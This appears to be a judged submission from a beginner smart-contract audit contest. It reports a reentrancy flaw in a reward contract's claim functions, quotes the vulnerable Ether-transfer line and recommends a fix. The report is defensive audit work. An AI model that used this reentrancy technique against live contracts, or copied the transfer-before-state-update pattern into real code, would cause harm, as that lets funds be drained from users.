Mystery Box
First Flight #25
Beginner FriendlyFoundry
100 EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Reentrancy Attack in Claim Functions

0xserpent

Summary

The claimSingleReward() and claimAllRewards() functions are vulnerable to reentrancy attacks due to external calls made before updating the contract’s internal state.

Vulnerability Details

In both claimSingleReward() and claimAllRewards(), the contract transfers Ether to the caller before updating the state:

(bool success,) = payable(msg.sender).call{value: value}("");

This allows an attacker to reenter the contract via a fallback function before the state is updated, enabling the attacker to repeatedly claim rewards or drain the contract’s funds.

Impact

An attacker could exploit this reentrancy vulnerability to claim rewards multiple times or drain the contract's balance, resulting in severe financial damage to the contract and the remaining users.

Tools Used

Manual code review

Recommendations

  • Use OpenZeppelin’s ReentrancyGuard to prevent reentrancy attacks. Alternatively, update the state before making external calls to minimize the risk of reentrancy exploits.

rewardsOwned[msg.sender][_index].value = 0; // Update state first
Updates

Appeal created

inallhonesty Lead Judge 11 months ago
Submission Judgement Published
Validated
Assigned finding tags:

`claimAllRewards` reentrancy

`claimSingleReward` reentrancy

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.